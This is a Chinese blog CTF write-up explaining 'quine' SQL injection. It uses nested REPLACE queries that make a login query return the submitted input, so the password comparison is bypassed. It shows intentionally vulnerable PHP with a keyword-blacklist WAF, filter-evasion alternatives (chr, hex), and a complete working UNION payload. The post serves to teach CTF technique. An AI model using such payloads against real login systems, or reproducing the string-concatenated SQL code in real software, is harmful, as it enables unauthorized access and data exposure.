HSCCTF-WEB-PWD(quine注入)

已于 2024-03-12 15:10:19 修改
阅读量868 收藏 18
点赞数 25
分类专栏: CTF 文章标签: 网络安全 web安全 安全
于 2024-03-12 15:07:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74855736/article/details/136651309
版权

WEB-PWD

直接给了源码:

<?php
error_reporting(0);
highlight_file(__FILE__);
$con = mysqli_connect("localhost","root","root","ccut");
function waffff($sql) {
    if (preg_match("/infor|sys|sql|thread|case|when|if|like|left|right|mid|cmp|sub|locate|position|match|find|field|sleep|repeat|lock|bench|process|<|>|=|xor|and|&&|\\\\/i", $sql)) {
        die("hacker");
    }
}
if (isset($_POST['password'])) {
    $password = $_POST['password'];
    waffff($password);
    $sql = "SELECT password FROM users WHERE username='admin' and password='$password'";
    $user_result = mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if ($row['password'] === $password) {
        include "/flag";
    } else {
        echo "error";
    }
}

思路:爆破密码,但like被过滤,因为界面显示,无论访问成功与否都是一样的,无法使用布尔盲注,时间盲注的化sleep,if,substr等函数也被禁用,该题使用一种quine注入的技巧

Quine是什么

quine是一种计算机程序,它不接受输入并产生自己源代码的副本作为唯一的输出。标准术语是自产生程序,能够直接读取自己源码、读入用户输入或空白的程序一般都不视为自产生程序。纪念美国哲学家奎恩(Willard Van Orman Quine)而命名

而在sql注入技术中,这是一种使得输入的sql语句和输出的sql语句一致的技术,常用于一些特殊的登陆绕过sql注入中

replace()函数 replace(object,search,replace) 把object对象中出现的search全部替换成replace

Quine的基本形式就是

REPLACE(str,编码的间隔符,str)

复制

参数str的形式为

REPLACE(间隔符,编码的间隔符,间隔符)

复制

这样运算的结果形式又变成了REPLACE(str,编码的间隔符,str)

例如间隔符为”.“,编码间隔符为CHAR(46),这样str就是

select REPLACE(".",CHAR(46),".");

+---------------------------+
| replace(".",char(46),".") |
+---------------------------+
| .                         |
+---------------------------+

复制

构造出来的结果就是

select REPLACE('REPLACE(".",CHAR(46),".")',CHAR(46),'REPLACE(".",CHAR(46),".")');

+---------------------------------------------------------------------------+
| replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")') |
+---------------------------------------------------------------------------+
| replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")") |
+---------------------------------------------------------------------------+

复制

但仔细观察可以发现还没有完全实现一致,在单双引号还存在细微区别

在刚刚构造的Quine中

Quine: REPLACE('str',编码的间隔符,'str')
str: REPLACE("间隔符",编码的间隔符,"间隔符")

复制

这里str中的间隔符使用双引号的原因是,str已经被单引号包裹,为避免引号匹配问题引入新的转义符号,间隔符需要使用双引号

运算后的结果是REPLACE("str",编码的间隔符,"str"),所以让结果的str也用单引号包裹就能让输入和查询结果完全一致了

这时候就需要使用REPLACEstr的双引号换成单引号,这样最后就不会出现引号不一致的情况了

升级版Quine的基本形式,CHAR(34)是双引号,CHAR(39)是单引号

REPLACE(REPLACE('str',CHAR(34),CHAR(39)),编码的间隔符,'str')

复制

升级版str的基本形式

REPLACE(REPLACE("间隔符",CHAR(34),CHAR(39)),编码的间隔符,"间隔符")

复制

先将str里的双引号替换成单引号,再用str替换str里的间隔符

那么结果就是

select replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');

+------------------------------------------------------------------------------------------------------------------------------------------------------------+
| replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') |
+------------------------------------------------------------------------------------------------------------------------------------------------------------+
| replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') |
+------------------------------------------------------------------------------------------------------------------------------------------------------------+

复制

实例解析

例题来源:第五空间智能安全大赛-Web-yet_another_mysql_injection

$password=$_POST['password'];
if ($username !== 'admin') {
    alertMes('only admin can login', 'index.php');
}
checkSql($password);
$sql="SELECT password FROM users WHERE username='admin' and password='$password';";
$user_result=mysqli_query($con,$sql);
$row = mysqli_fetch_array($user_result);
if (!$row) {
    alertMes("something wrong",'index.php');
}
if ($row['password'] === $password) {
	die($FLAG);
}

复制

这是一部分源码,这段代码逻辑要求username必须为admin,密码需要与查询到的password一致,才能拿到flag

通过盲注可以发现数据库里面是空表,因此需要我们的输入与最后的结果相等绕过验证,这就需要用到Quine

这里我们就来分析一手payload

1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

复制

其中1'/**/union/**/select/**/replace(replace('',char(34),char(39)),char(46),'')#是Quine的基本形式

1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#是str的基本形式

这样嵌套起来多次替换就达到了输入输出的相同的目的

如果char被过滤了,可以使用chr0x绕过

char(34),char(39)
chr(34),chr(39)
0x22,0x27

综上

payload:

password=1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

TK-K
关注
  • 25
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 584
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
记录一次quine注入的学习
Zh1A0的博客
08-24 877
记录一次sql注入Quine注入的学习
SQL注入Quine注入
Aiwin的博客
06-29 2645
SQL注入Quine注入
sql注入 Quine注入解析
arcuied
04-24 854
sql注入 Quine注入解析
[HDCTF 2023]LoginMaster 复现 (记quine注入
qq_73767109的博客
04-24 875
benchmark时间盲注 [HDCTF 2023]LoginMaster 复现 quine注入解释
docker-registry-web
snipercai的博客
11-21 3297
摘录自:https://github.com/mkuchin/docker-registry-web Web UI, authentication service and event recorder for private docker registry v2.   Features: Browsing repositories, tags and images in
注入漏洞-sql注入
热门推荐
一个很酷的人
04-30 4万+
注入漏洞 注入漏洞 1 SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者意图去执行SQL语句。 1.1 SQL注入的...
易语言-陌声登录pwd算法
06-26
"陌声登录pwd算法"是关于易语言在实现网络应用中的一个具体实践,特别是涉及到用户登录过程中的密码处理机制。在网络安全日益重要的今天,密码加密算法是保护用户信息安全的关键环节。 在登录系统中,pwd(Password...
实验82-Linux命令:pwd命令1
08-08
实验82 Linux命令:pwd命令82.1 实验目的1. 学会linux命令pwd的使用方法;82.3.2 pwd命令格式pwd [选项]82.3.3 p
random-password-generator:随机PWD发生器
03-17
密码生成器密码生成器
mqtt-smarthome-webui
05-05
设定档 提供具有要提供的页面结构的文件data.yaml ,请参见以供参考。... dersimn/mqtt-smarthome-webui SSL / HTTPS 如果您在/ssl提供SSL密钥/证书对,则Docker映像还将启用HTTPS: /ssl/nginx.key
ui-registry:IPFS分散式Web组件注册表
02-02
@ rxdi / ui-registry 组件的可重用性IPFS组件注册表去中心化的未来建立本地...p 8957:8957 \ -p 5001:5001 \ -p 8080:8080 \ -p 9300:9300 \ -v $( pwd ) /my-project:/usr/src/app/files \ -v $( pwd ) /packages:/us
SeedLabs-Web安全-XSSProblem
Anonymity
06-15 778
. List item XSSProblem Problem问答 文章目录XSSProblem问题记录P-1 使用LiveHTTPHeader,我们发现下面的GET请求P-2 使用LiveHTTPHeader,我们发现以下POST请求P-3 在书的清单C.2中(C是XSS章节的章节号;其实际价值取决于您使用的是哪个版本的书),我们在发送之前添加了一张支票修改Samy自己配置文件的Ajax请求。这次检查的主要目的是什么?P-4 为了解决XSS攻击,开发人员决定在浏览器端实现过滤。基本上,开发人员计划在发送数
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8350
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全之初始访问阶段攻防手段(三)
子非渔
07-25 979
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
中小企业常见的网络安全问题及防范措施
w651428055的博客
07-22 688
在当今数字化时代,Web应用程序已经成为企业与用户互动的主要平台,但随之而来的是日益复杂的网络安全威胁。为了保护Web应用程序免受各种攻击,Web应用程序防火墙(WAF)应运而生。本文将深入探讨WAF的概念、工作原理、分类、特点以及如何选择和部署WAF,帮助读者更全面地理解WAF在网络安全中的重要作用。
网络安全相关竞赛比赛
黑战士的博客
07-18 1042
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
2024春秋杯网络安全联赛夏季赛Crypto(AK)解题思路及用到的软件
符啸九天的博客
07-22 1073
2024春秋杯网络安全联赛夏季赛Crypto解题思路以及用到的软件1.vm(虚拟机kali)和Ubuntu,正常配置即可B站有很多。2.Visual Studio Code(里面要配置python,crypto库和Sagemath数学软件系统Sagemath)。3.随波逐流工作室 (1o1o.xyz)ctf工具。2024春秋竞赛ezzzecc视频解题思路2024春秋竞赛happy2024视频解析2024春秋竞赛夏季赛Signature解题思路
企业产品网络安全建设日志0725
最新发布
KD的疯狂实验室
07-25 308
显然,这种说法是安全工作中的一个挑战。因为推动时间也蛮长了,做出了:只要升级一部分,易升级的组件即可。前天遇到的挑战是某后端部门排期出现问题,本应该做漏洞提升的时间被其他工作插入。测试团队需要进一步支持,因为组件升级,许可证升级以及后续的编码安全建立都是一串蚂蚱。基础的安全种子显然已经埋下。团队有人A提出,是否有必要按照某软件报的漏洞信息实施安全提升工作。我们的信息安全策略就是通过覆盖三防组件风险,降低我们产品自身的风险。特别是搬出来A之前在,其他企业的经验,即。安全宣讲和必要的沟通是无法回避的。
putty.exe -ssh执行命令 pwd
06-13
如果您想在远程主机上执行pwd命令来打印当前工作目录,可以使用以下命令行: ``` putty.exe -ssh your_username@your_remote_host -pw your_password -m - <<< "pwd" ``` 其中,"your_username"替换为您在远程主机...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值